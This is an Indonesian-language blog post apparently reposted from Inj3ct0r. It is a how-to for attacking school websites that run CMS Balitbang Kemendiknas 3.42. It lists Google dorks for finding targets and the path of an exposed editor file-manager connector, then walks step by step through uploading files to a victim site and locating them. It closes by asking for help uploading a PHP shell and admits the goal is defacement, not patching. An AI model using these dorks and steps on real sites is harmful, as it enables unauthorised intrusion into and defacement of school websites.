CMS Balitbang Kemendiknas 3.42
Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu
CMS ( Content Management System ) yang sudah siap pakai dan biasanya
dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang
Kemendiknas Indonesia.
Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r .Mari kita simak secara seksama. Cekibroott !
CMS Balitbang Kemendiknas 3.42
Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"
Exploit :
http://public_html/dir/editor/filemanager/connectors/test.html
1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
5). Maka nanti tampilannya akan seperti ini :
6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target.
Catatan :
File yang bisa disisipkan hanya file yang berekstensi .txt
7). Jika file sukses terupload, maka akan tampil seperti dibawah ini.
8). Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...
Catatan :
File akan berada disini, Contoh : http://target.com/userfiles/file/Nama_File.txt
Gimana, mudahkan caranya? Sekian dulu tutorial dari saya kali ini, kalau ada yang bisa edit supaya bisa upload shell.php kasih tau ane yak wkwk :p
Dan saya minta maaf kalau kebanyakan web yang dijadikan target adalah website Indonesia, karena umumnya website-website sekolah di Indonesia menggunakan CMS Balitbang ini :'(
Satu lagi, saya mohon maaf kalo hanya bisa deface tapi tidak bisa patching, soalnya ngga ada yang ngajarin bijimane cara protectnya :'(
Wassalam.
sumber
0 komentar Blogger 0 Facebook
Posting Komentar